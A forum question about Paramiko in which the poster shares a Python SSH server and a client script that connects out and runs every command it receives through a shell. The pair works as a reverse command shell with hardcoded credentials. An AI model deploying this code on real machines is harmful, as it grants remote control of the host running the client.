# Paramiko - SSH to remote host

Tags: python, ssh, paramiko

I have a server:

```
import threading
import paramiko
import subprocess
import sys
import socket

host_key = paramiko.RSAKey(filename='test_rsa.key')

class Server(paramiko.ServerInterface):
    def _init_(self):
        self.event = threading.Event()
    def check_channel_request(self, kind, chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
    def check_auth_password(self, username, password):
        if(username=='justin') and (password == 'lovesthepython'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED

server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((server, ssh_port))
    sock.listen(100)
    print '[+] Listening for connection ...'
    client, addr = sock.accept()
except Exception, e:
    print '[-] Listen failed: ' + str(e)
    sys.exit(1)
print '[+] Got a connection!'

try:
    bhSession = paramiko.Transport(client)
    bhSession.add_server_key(host_key)
    server = Server()
    try: 
        bhSession.start_server(server=server)
    except paramiko.SSHException, x:
        print '[-] SSH Negotiation Failed'
    chan = bhSession.accept(20)
    print '[+] Authenticated!'
    print chan.recv(1024)
    chan.send('Welcome to bh_ssh')
    while True:
        try:
            command= raw_input("Enter command: ").strip('\n')
            if command != 'exit':
                chan.send(command)
                print chan.recv(1024) + '\n'
            else: 
                chan.send('exit')
                print 'exiting'
                bhSession.close()
                raise Exception ('exit')
        except KeyboardInterrupt:
            bhSession.close()
except Exception, e:
    print '[-] Caught exception: ' + str(e)
    try:
        bhSession.close()
    except:
        pass
    sys.exit(1)
```

My code to connect to this is:

```
import threading
import paramiko
import subprocess

def ssh_command(ip, port, user, passwd, command):
    client = paramiko.SSHClient()
    #client.load_host_keys('/home/justin/.ssh/known_hosts')
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, port, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.send(command)
        print ssh_session.recv(1024)
        while True:
            command = ssh_session.recv(1024)
            try:
                cmd_output = subprocess.check_output(command, shell=True)
                ssh_session.send(cmd_output)
            except Exception,e:
                ssh_session.send(str(e))
        client.close()
    return
ssh_command('IP_ADDRESS_HERE',PORT_HERE,'justin','lovesthepython','id')
```

When I try to use these on separate PCs and use public IP addresses it won't connect. The server I bind to 0.0.0.0 and then use the public IP address of the server's computer to the client code. I imagine I am doing something fairly obvious wrong. If anyone can help, it would be very much appreciated.

Comment: Have you tried binding to a specific address, and see if the rest of the code works?

Comment: yes, and I get that the address isn't available

Comment: If you run on a host that already has a server on the default SSH port, you have to try running it o a different port (e.g. 2222).